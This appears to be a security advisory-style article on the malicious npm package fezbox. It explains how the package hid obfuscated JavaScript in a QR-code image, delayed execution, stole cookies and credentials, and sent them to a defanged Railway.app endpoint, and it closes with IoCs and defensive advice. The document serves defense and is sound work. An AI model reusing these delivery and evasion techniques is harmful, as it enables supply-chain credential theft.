Researchers at Socket report that the npm package fezbox used an unconventional delivery method: obfuscated JavaScript was embedded inside a QR-code image (JPG) fetched from an attacker-controlled server. Before npm administrators removed the package, it had been downloaded at least 327 times, underscoring the continuing risk of open-source supply chain attacks. BleepingComputer confirms the analysis and notes the core logic resides in dist/fezbox.cjs (e.g., version 1.3.0), which is heavily minified but reveals malicious behavior when deobfuscated.
What happened: malicious package in the JavaScript ecosystem
Fezbox concealed instructions to retrieve a high-density QR image and then parse it to trigger a second-stage payload. While QR codes are typically scanned by cameras, this image is intentionally too dense for casual scanning and is meant for machine parsing by the package itself. This approach helps blend malicious activity into seemingly harmless image downloads.
Two-stage QR-code delivery and execution
Stage 1: Covert retrieval of a dense QR JPG
Upon execution, fezbox downloads an unusually “dense” QR-code image. Rather than encoding a URL for a human to scan, the image encapsulates obfuscated JavaScript designed to be programmatically extracted. The URL used to fetch the image is stored in reverse order inside the code (e.g., http(s):// patterns are reversed), frustrating straightforward static string matching.
Stage 2: Delayed unpacking and payload execution
After a series of environmental checks, fezbox waits approximately 120 seconds before decoding and executing the hidden script. The payload focuses on stealing cookies via document.cookie and attempts to collect username and password values if available. Collected data is exfiltrated via HTTPS POST to https://my-nest-app-production[.]up[.]railway[.]app/users. If the targeted fields are absent, the code exits quietly, reducing the likelihood of raising alarms.
Evasion, obfuscation, and anti-analysis techniques
The package evaluates its runtime environment, likely to detect development or virtualized analysis conditions and lower exposure to automated detection. It further obscures behavior by reversing strings (e.g., “drowssap” reconstructed as “password”) and by delaying execution, which can bypass time-limited sandboxing and heuristic analysis. Because the initial network call fetches a JPG, many proxies and monitoring tools may interpret the traffic as benign resource loading.
Why this tactic works and who is at risk
Embedding code in QR images masks the malicious payload within a familiar media type, complicating both static and signature-based analysis. Teams that bundle third-party packages into client-side builds, run post-install scripts, or allow unvetted runtime dependencies face heightened exposure. Incidents such as event-stream (2018) and UAParser.js (2021) have shown how quickly malicious logic can propagate via popular registries; fezbox illustrates the continued evolution of these techniques, now leveraging image-based steganography-like delivery.
Indicators of compromise (IoCs)
Organizations should review build and runtime logs for references to fezbox, access to dist/fezbox.cjs (notably version 1.3.0), delayed execution patterns of roughly two minutes, requests for dense QR JPG files, and outbound HTTPS POSTs to Railway.app—specifically my-nest-app-production[.]up[.]railway[.]app/users.
Defensive recommendations for developers and organizations
Harden your supply chain posture: pin dependency versions using lockfiles, remove unused packages, prefer vetted mirrors, and employ software composition analysis (SCA). Review post-install and runtime scripts; consider building with policies that restrict execution of untrusted scripts.
Protect authentication data: set cookies with HttpOnly, Secure, and SameSite flags. HttpOnly prevents document.cookie access, mitigating theft even if hostile JavaScript executes in the browser.
Strengthen CI/CD and egress controls: isolate build pipelines, adopt deny-by-default policies for outbound traffic, log network access, and block unknown endpoints. Monitor for anomalous image fetches followed by dynamic code execution or unexpected POST requests.
Practice continuous dependency hygiene: regularly audit dependencies, track transitive packages, and adopt least-privilege principles for libraries included in client bundles.
Fezbox is a reminder that adversaries continue to refine supply chain tradecraft, exploiting overlooked channels like image retrieval to hide code delivery. Teams should validate whether fezbox was present in their projects, inspect network logs for requests to Railway.app endpoints, and ensure session cookies are protected with HttpOnly. Combining strict dependency controls, hardened cookie policies, and monitored egress paths significantly reduces the blast radius of similar npm-borne threats.
